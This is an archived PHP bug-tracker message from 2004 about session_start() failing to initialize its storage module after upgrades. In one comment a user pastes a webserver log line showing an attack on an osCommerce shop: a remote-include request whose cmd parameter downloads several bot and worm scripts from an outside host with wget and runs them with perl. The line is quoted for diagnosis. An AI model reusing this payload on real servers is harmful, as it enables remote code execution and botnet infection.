#25876 [Com]: session_start(): Failed to initialize storage module
| From: | phpbugs at expires-200501 dot dpits dot com | Date: | Mon, 27 Dec 2004 10:41:06 +0000 |
| Subject: | #25876 [Com]: session_start(): Failed to initialize storage module | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-71118@lists.php.net to get a copy of this message | ||
ID: 25876
Comment by: phpbugs at expires-200501 dot dpits dot com
Reported By: golden at riscom dot com
Status: Feedback
Bug Type: Session related
Operating System: freebsd 4.8
PHP Version: 4.3.3
New Comment:
i found some interesting. here the php-errorlog:
[26-Dec-2004 15:37:40] PHP Warning: Unknown(): A session is active.
You cannot change the session module's ini settings at this time. in
Unknown on line 0
[26-Dec-2004 15:38:47] PHP Fatal error: session_start(): Failed to
initialize storage module: user (path: /tmp/php_sessions) in
/www/x/main.inc.php on line 20
and in the webserver-log i found this attack:
x.x.x.x - - [26/Dec/2004:15:37:40 +0100] "GET
/shop.php/cPath/2?osisSid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
HTTP/1.0" 200 29102 "-" "LWP::Simple/5.53"
(it is OSCommerce-Shop)
Thankyou...
Previous Comments:
------------------------------------------------------------------------
[2004-12-27 10:34:09] tony2001@php.net
Not reproducible for me with Apache 1.3.29 & php4-CVS.
Please provide more info on how to reproduce it.
------------------------------------------------------------------------
[2004-12-27 10:17:10] admin at ehost dot pl
the same problem Apache 1.3.33 RedHat ES 3 and Redhat 9.0 from the
moment that we upgrade php to 4.3.10
------------------------------------------------------------------------
[2004-12-27 10:12:03] support at nthost dot ru
Experiencing this bug on FreeBSD 4.9 with PHP 4.3.10.
------------------------------------------------------------------------
[2004-12-27 08:45:42] vsoletic at konix dot com
All my websites experienced this problem after upgrade to 4.3.10.
------------------------------------------------------------------------
[2004-12-27 07:31:09] dave at my-ecoach dot com
Seeing the same issue on FreeBSD 4.9 with PHP 4.3.9 and Apache 1.3.33.
------------------------------------------------------------------------
The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
http://bugs.php.net/25876
--
Edit this bug report at http://bugs.php.net/?id=25876&edit=1